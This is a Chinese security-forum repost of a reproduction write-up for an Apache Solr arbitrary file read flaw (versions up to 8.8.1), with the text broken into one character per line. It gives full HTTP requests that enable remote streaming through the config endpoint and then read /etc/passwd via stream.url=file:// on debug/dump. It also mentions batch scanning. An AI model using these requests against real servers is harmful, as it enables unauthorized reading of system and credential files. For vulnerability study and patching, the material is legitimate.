论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[20549] 2021-03-18_(0day)ApacheSolr任意文件读取漏洞复现
文档创建者:
s7ckTeam
浏览次数:
10
最后更新:
2025-01-18
漏洞
10 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-03-18_(0day)ApacheSolr任意文件读取漏洞复现
(
0
d
a
y
)
A
p
a
c
h
e
S
o
l
r
任
意
文
件
读
取
漏
洞
复
现
K
h
a
n
安
全
攻
防
实
验
室
2
0
2
1
-
0
3
-
1
8
以
下
文
章
来
源
于
t
h
e
l
o
s
t
w
o
r
l
d
,
作
者
t
h
e
l
o
s
t
w
o
r
l
d
A
p
a
c
h
e
S
o
l
r
任
意
文
件
读
取
漏
洞
复
现
一
、
简
介
S
o
l
r
是
一
个
独
立
的
企
业
级
搜
索
应
用
服
务
器
,
它
对
外
提
供
类
似
于
W
e
b
-
s
e
r
v
i
c
e
的
A
P
I
接
口
。
用
户
可
以
通
过
h
t
t
p
请
求
,
向
搜
索
引
擎
服
务
器
提
交
一
定
格
式
的
X
M
L
文
件
,
生
成
索
引
;
也
可
以
通
过
H
t
t
p
G
e
t
操
作
提
出
查
找
请
求
,
并
得
到
X
M
L
格
式
的
返
回
结
果
。
A
p
a
c
h
e
-
S
o
l
r
任
意
文
件
读
取
漏
洞
漏
洞
,
攻
击
者
可
以
在
未
授
权
的
情
况
下
读
取
目
标
服
务
器
敏
感
文
件
和
相
关
内
容
。
二
、
影
响
版
本
A
p
a
c
h
e
S
o
l
r
<
=
8
.
8
.
1
三
、
漏
洞
复
现
安
装
:
t
h
e
l
o
s
t
w
o
r
l
d
.
开
发
、
安
全
学
习
-
工
作
记
录
S
o
l
r
下
载
地
址
:
自
行
下
载
对
应
满
足
版
本
h
t
t
p
:
/
/
a
r
c
h
i
v
e
.
a
p
a
c
h
e
.
o
r
g
/
d
i
s
t
/
l
u
c
e
n
e
/
s
o
l
r
/
访
问
页
面
第
一
步
:
获
取
c
o
r
e
的
信
息
:
主
要
是
n
a
m
e
h
t
t
p
:
/
/
x
x
x
.
x
x
x
.
x
x
x
.
x
x
x
/
s
o
l
r
/
a
d
m
i
n
/
c
o
r
e
s
?
i
n
d
e
x
I
n
f
o
=
f
a
l
s
e
&
w
t
=
j
s
o
n
详
细
数
据
包
第
二
步
:
判
断
是
否
存
在
漏
洞
:
返
回
2
0
0
并
且
包
含
T
h
i
s
r
e
s
p
o
n
s
e
f
o
r
m
a
t
i
s
e
x
p
e
r
i
m
e
n
t
a
l
.
I
t
i
s
l
i
k
e
l
y
t
o
c
h
a
n
g
e
i
n
t
h
e
f
u
t
u
r
e
可
能
存
在
,
需
要
进
一
步
的
去
读
取
/
e
t
c
/
p
a
s
s
w
d
或
者
其
他
进
行
确
认
最
终
是
否
存
在
读
取
漏
洞
详
细
数
据
包
:
第
三
步
:
读
取
文
件
/
e
t
c
/
p
a
s
s
w
d
:
G
E
T
/
s
o
l
r
/
a
d
m
i
n
/
c
o
r
e
s
?
i
n
d
e
x
I
n
f
o
=
f
a
l
s
e
&
w
t
=
j
s
o
n
H
T
T
P
/
1
.
1
H
o
s
t
:
1
2
7
.
0
.
0
.
1
:
8
9
8
3
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
M
a
c
i
n
t
o
s
h
;
I
n
t
e
l
M
a
c
O
S
X
1
0
_
1
5
_
7
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
C
h
r
o
m
e
/
8
7
.
0
.
4
2
8
0
.
6
7
S
a
f
a
r
i
/
5
3
7
.
3
6
E
d
g
/
8
7
.
0
.
6
6
4
.
5
2
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
;
q
=
0
.
9
,
i
m
a
g
e
/
w
e
b
p
,
i
m
a
g
e
/
a
p
n
g
,
*
/
*
;
q
=
0
.
8
,
a
p
p
l
i
c
a
t
i
o
n
/
s
i
g
n
e
d
-
e
x
c
h
a
n
g
e
;
v
=
b
3
;
q
=
0
.
9
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
9
,
e
n
;
q
=
0
.
8
,
e
n
-
G
B
;
q
=
0
.
7
,
e
n
-
U
S
;
q
=
0
.
6
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
P
O
S
T
/
s
o
l
r
/
t
e
s
l
a
/
c
o
n
f
i
g
H
T
T
P
/
1
.
1
H
o
s
t
:
1
2
7
.
0
.
0
.
1
:
8
9
8
3
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
8
0
C
a
c
h
e
-
C
o
n
t
r
o
l
:
m
a
x
-
a
g
e
=
0
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
O
r
i
g
i
n
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
9
8
3
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
C
h
r
o
m
e
/
8
9
.
0
.
4
3
8
9
.
8
2
S
a
f
a
r
i
/
5
3
7
.
3
6
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
;
q
=
0
.
9
,
i
m
a
g
e
/
a
v
i
f
,
i
m
a
g
e
/
w
e
b
p
,
i
m
a
g
e
/
a
p
n
g
,
*
/
*
;
q
=
0
.
8
,
a
p
p
l
i
c
a
t
i
o
n
/
s
i
g
n
e
d
-
e
x
c
h
a
n
g
e
;
v
=
b
3
;
q
=
0
.
9
R
e
f
e
r
e
r
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
9
8
3
/
s
o
l
r
/
t
e
s
l
a
/
c
o
n
f
i
g
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
9
,
e
n
-
U
S
;
q
=
0
.
8
,
e
n
;
q
=
0
.
7
,
z
h
-
T
W
;
q
=
0
.
6
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
{
"
s
e
t
-
p
r
o
p
e
r
t
y
"
:
{
"
r
e
q
u
e
s
t
D
i
s
p
a
t
c
h
e
r
.
r
e
q
u
e
s
t
P
a
r
s
e
r
s
.
e
n
a
b
l
e
R
e
m
o
t
e
S
t
r
e
a
m
i
n
g
"
:
t
r
u
e
}
}
详
细
数
据
包
:
编
写
检
测
脚
本
:
显
示
读
取
内
容
:
直
接
跑
存
在
不
现
实
读
取
内
容
:
批
量
出
来
效
果
还
是
不
错
的
P
O
S
T
/
s
o
l
r
/
t
e
s
l
a
/
d
e
b
u
g
/
d
u
m
p
?
p
a
r
a
m
=
C
o
n
t
e
n
t
S
t
r
e
a
m
s
H
T
T
P
/
1
.
1
H
o
s
t
:
1
2
7
.
0
.
0
.
1
:
8
9
8
3
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
2
9
C
a
c
h
e
-
C
o
n
t
r
o
l
:
m
a
x
-
a
g
e
=
0
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
O
r
i
g
i
n
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
9
8
3
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
C
h
r
o
m
e
/
8
9
.
0
.
4
3
8
9
.
8
2
S
a
f
a
r
i
/
5
3
7
.
3
6
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
;
q
=
0
.
9
,
i
m
a
g
e
/
a
v
i
f
,
i
m
a
g
e
/
w
e
b
p
,
i
m
a
g
e
/
a
p
n
g
,
*
/
*
;
q
=
0
.
8
,
a
p
p
l
i
c
a
t
i
o
n
/
s
i
g
n
e
d
-
e
x
c
h
a
n
g
e
;
v
=
b
3
;
q
=
0
.
9
R
e
f
e
r
e
r
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
9
8
3
/
s
o
l
r
/
t
e
s
l
a
/
c
o
n
f
i
g
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
9
,
e
n
-
U
S
;
q
=
0
.
8
,
e
n
;
q
=
0
.
7
,
z
h
-
T
W
;
q
=
0
.
6
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
s
t
r
e
a
m
.
u
r
l
=
f
i
l
e
:
/
/
/
e
t
c
/
p
a
s
s
w
d
参
考
:
h
t
t
p
s
:
/
/
m
p
.
w
e
i
x
i
n
.
q
q
.
c
o
m
/
s
/
5
U
0
4
Q
h
r
_
K
B
C
z
n
A
b
X
e
9
j
E
e
g
免
责
声
明
:
本
站
提
供
安
全
工
具
、
程
序
(
方
法
)
可
能
带
有
攻
击
性
,
仅
供
安
全
研
究
与
教
学
之
用
,
风
险
自
负
!
转
载
声
明
:
著
作
权
归
作
者
所
有
。
商
业
转
载
请
联
系
作
者
获
得
授
权
,
非
商
业
转
载
请
注
明
出
处
。
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞